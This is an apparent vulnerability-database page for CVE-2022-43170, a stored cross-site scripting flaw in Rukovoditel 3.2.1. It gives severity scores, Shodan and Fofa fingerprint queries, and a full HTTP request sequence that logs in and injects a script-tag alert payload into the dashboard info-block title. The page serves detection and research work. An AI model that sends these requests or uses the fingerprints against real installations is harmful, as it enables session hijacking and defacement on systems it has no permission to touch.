🔙 목록으로 돌아가기

CVE-2022-43170: Rukovoditel <= 3.2.1 - Cross Site Scripting

TitleRukovoditel <= 3.2.1 - Cross Site Scripting
Authorr3Y3r53
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
RemediationUpgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability.
CVSS Score5.4
EPSS Score0.06517
CVE IDCVE-2022-43170
CWE IDCWE-79
Shodan Queryhttp.favicon.hash:-1499940355
Fofa Queryicon_hash=-1499940355
Tags cve cve2022 rukovoditel stored-xss xss authenticated vuln

🔍 Vulnerability Description

A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking “Add info block”.

🌐 HTTP Request

GET /index.php?module=users/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
POST /index.php?module=users/login&action=login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Connection: close
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

form_session_token=hu46zi&username=4abQ6J&password=XNyrPe
POST /index.php?module=dashboard_configure/index&action=save&token=hu46zi HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.16
Connection: close
Content-Length: 171
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

form_session_token=hu46zi&type=info_block&is_active=1&sections_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order=

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-43170.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-43170.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A